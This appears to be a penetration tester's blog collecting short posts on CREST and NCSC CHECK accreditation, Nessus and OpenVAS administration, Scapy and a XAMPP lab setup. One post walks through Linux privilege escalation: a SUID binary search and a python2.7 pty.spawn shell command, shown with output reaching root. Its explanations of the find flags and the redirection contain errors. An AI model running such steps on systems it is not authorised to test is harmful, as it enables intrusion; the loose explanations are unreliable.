I have created a new hacking team on Hack the Box (HTB), which is open for new members to join.
Here is the public link to the HTB team – Blackintrusive
New CREST penetration testing certifications
CREST has recently announced several new penetration testing certifications:
- CREST Registered Security Analyst (Penetration Testing) – CRSA
- CREST Certified Security Consultant (Red Team) – CCSC RED
- CREST Certified Security Consultant (Networks) – CCSC NET
- CREST Certified Security Consultant (Web) – CCSC WEB
Further information can be found on the CREST website.
How to become CHECK “green lighted” to deliver ITHC (guidance for organisations and people)
For a company to become a CHECK approved organisation, otherwise known as having been granted a green light status to undertake ITHC penetration testing or vulnerability assessment services, a CHECK approved company is able to conduct security assessments for UK government agencies or critical national infrastructures (CNI).
NCSC has the following to say when discussing what CHECK is and what it means for penetration testing services:
CHECK is the term for the NCSC approved penetration test companies and the methodology used to conduct a penetration test. Companies providing CHECK services do so using staff who hold NCSC approved qualifications and have suitable experience. Penetration tests are conducted using NCSC recognised methods and the subsequent report and recommendations are produced to a recognised standard.
Also directly qouted from the NCSC website for obtaining CHECK, the following criteria must be met prior to the CHECk assessment:
- the company must be able to sign-up to English law
- the company must have performed penetration testing service under their company name for a minimum of 12 months
- all proposed team members must be able to hold SC clearance
- there is a minimum of one team member who has passed a CHECK Team Leader examination, and can provide a technical (only) CV, 2 redacted penetration test reports they have authored, and have at least 12 months penetration testing experience
Guidance for organisations seeking to be assessed by NCSC in order to obtain CHECK status can be found: here
How to join CREST as an organisational member
CREST is widely known in the penetration testing indusry, due to CREST’s professional membership scheme, professional certification for penetraiton testers, and support towards becoming CHECK with NCSC.
Ann excert from CREST’s website regarding membership:
In accordance with CREST’s stated aim “to increase professionalism in the security testing industry”, CREST places requirements on member companies in order to ensure that consistent standards of services are delivered.
It is worth noting that as covered in the FAQ provided by CREST, obtaining organisational membership is not dependant on people holding CREST-based certifications.
For full guidance on joining CREST as an organisational member (for organisations), the following link will be of help: click here
Nessus has detected that API access on this scanner is disabled.
Nessus displays warning “Nessus has detected that API access on this scanner is disabled” during usage.
To fix this issue, the Nessus service must be stopped, the configuration reset, Nessus restarted and then registered using your previous registration key.
1. Stop the Nessus service:
service nessusd stop
2. Reset the configuration:
/opt/nessus/sbin/nessuscli fix --reset
3. Start the Nessus service:
service nessusd start
4. Register Nessus using your previous registration key:
/opt/nessus/sbin/nessuscli fetch --register xxxx-xxxx-xxxx-xxxx-xxxx
5. Login to Nessus to update plugins.
OpenVAS Administrator Password Reset
To reset the admin password (Administrator) for OpenVAS, the following command can be used to reset the password:
openvasmd --user=admin --new-password=admin_password
Alternatively, you can use this command to create additional users:
openvasmd --user=new_user--new-password=user_password
Searching for binaries for privilege escalation exploit
During the attacking phase of a pen test once access has been gained to a shell, we can try to own the system through a privilege escalation exploit in order to obtain root access. We can verify the system identification of the user by using the following command to ascertain SUID permissions:
$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
Then we can use the following command, to find a list of executable file SUID permissions on the system:
find / -perm -u=s -type f 2>/dev/null
Here, the find command will search from root (/) looking for user SUID permissions configured to execute (-perm -u=s), and to find directories (-type f). The result of this search, will be redirected to standard error and use a null device to suppress output (2>/dev/null).
Example show below:
$ find / -perm -u=s 2>/dev/null
/sbin/mount.nfs
/usr/sbin/exim4
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/python2.7
/usr/bin/chsh
/usr/bin/at
/usr/bin/mawk
/usr/bin/chfn
/usr/bin/procmail
/usr/bin/passwd
/bin/su
/bin/umount
/bin/mount
Note that if redirect to stdout (>) or (1>) was used instead of stderr (2>), we would see a list of permission denied errors. As given from the above example, we could look to use Python2.7 binary in an attempt to gain root access using a privilege escalation exploit. We can use the following command to achieve this in using our above example:
/usr/bin/python2.7 -c ‘import pty;pty.spawn(“/bin/sh”)’
This command will get a TTY shell after a reverse shell connection using Python2.7. This should result in the system permitting root access, and this can be seen from the following commands:
# id
uid=1000(user) gid=1000(user) euid=0(root) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),114(bluetooth)
# whoami
root
We can see that the system user now has root access, denoted from the above by euid=0(root) and root identified from whoami command.
List of Tenable Nessus plugins
AIX Local Security Checks
Amazon Linux Local Security Checks
Backdoors
Brute force attacks
CentOS Local Security Checks
CGI abuses
CGI abuses : XSS
CISCO
Databases
Debian Local Security Checks
Default Unix Accounts
Denial of Service
DNS
F5 Networks Local Security Checks
Fedora Local Security Checks
Firewalls
FreeBSD Local Security Checks
FTP
Gain a shell remotely
General
Gentoo Local Security Checks
HP-UX Local Security Checks
Huawei Local Security Checks
Incident Response
Junos Local Security Checks
MacOS X Local Security Checks
Mandriva Local Security Checks
Misc.
Netware
Oracle Linux Local Security Checks
OracleVM Local Security Checks
Palo Alto Local Security Checks
Peer-To-Peer File Sharing
PhotonOS Local Security Checks
Red Hat Local Security Checks
RPC
SCADA
Scientific Linux Local Security Checks
Service detection
Settings
Slackware Local Security Checks
SMTP problems
SNMP
Solaris Local Security Checks
SuSE Local Security Checks
Ubuntu Local Security Checks
Virtuozzo Local Security Checks
VMware ESX Local Security Checks
Web Servers
Windows
Windows : Microsoft Bulletins
Windows : User management
Using Scapy (Python packet manipulation program)
Scapy is a Python program that enables the user to send, sniff and dissect and forge network packets. This capability allows construction of tools that can probe, scan or attack networks.
In other words, Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. Scapy can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery. It can replace hping, arpspoof, arp-sk, arping, p0f and even some parts of Nmap, tcpdump, and tshark).
Online guidance for using Scapy can be found here: Link
Setting up XAMPP for Personal XSS Labs
XAMPP (Cross-platform, Apache + MariaDB + PHP + Perl).
1. Download XAMPP from link below:
2. Follow the XAMPP setup wizard.
3. Leave default XAMPP components enabled (Server, Program Languages, etc.).
4. Select installation folder location.
5. Run XAMPP Control Panel.
6. Enable Apache and MySQL modules by selecting the Start action buttons.
7. Open browser and navigate to localhost or 127.0.0.1 to display XAMPP. This will verify XAMPP is running successfully.